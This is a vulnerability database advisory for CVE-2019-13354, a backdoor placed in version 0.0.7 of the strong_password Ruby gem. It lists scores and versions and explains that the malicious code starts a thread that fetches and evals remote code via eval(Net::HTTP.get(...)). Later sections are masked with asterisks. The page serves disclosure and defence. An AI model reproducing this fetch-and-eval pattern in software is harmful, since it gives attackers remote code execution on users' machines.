Miggo Logo
Miggo Vulnerability Database
CVE-2019-13354

CVE-2019-13354: strong_password Ruby gem malicious version causing Remote Code Execution vulnerability

9.8

CVSS Score
3.0

Basic Information

CVE ID
CVE-2019-13354
GHSA ID
GHSA-5h5r-ffc4-c455
EPSS Score
0.71714%
CWE
CWE-94
Published
7/8/2019
Updated
11/4/2023
KEV Status
No
Technology
TechnologyRuby

Technical Details

CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
strong_passwordrubygems= 0.0.70.0.8

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from malicious code added in version 0.0.7. The _! method is explicitly defined to execute code blocks while suppressing exceptions. It is immediately invoked to start a background thread that fetches and evaluates remote code (via eval(Net::HTTP.get(...))), enabling RCE. This matches CWE-94 (Code Injection) and aligns with third-party analyses confirming the backdoor's behavior. The code was removed in version 0.0.8, confirming its malicious role.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

T** stron*_p*sswor* **m *.*.* *or Ru*y, *s *istri*ut** on Ru*y**ms.or*, in*lu*** * *o**-*x**ution ***k*oor ins*rt** *y * t*ir* p*rty. V*rsion *.*.* *o*s not *ont*in t** ***k*oor.

Reasoning

T** vuln*r**ility st*ms *rom m*li*ious *o** ***** in v*rsion *.*.*. T** `_!` m*t*o* is *xpli*itly ***in** to *x**ut* *o** *lo*ks w*il* suppr*ssin* *x**ptions. It is imm**i*t*ly invok** to st*rt * ***k*roun* t*r*** t**t **t***s *n* *v*lu*t*s r*mot* *o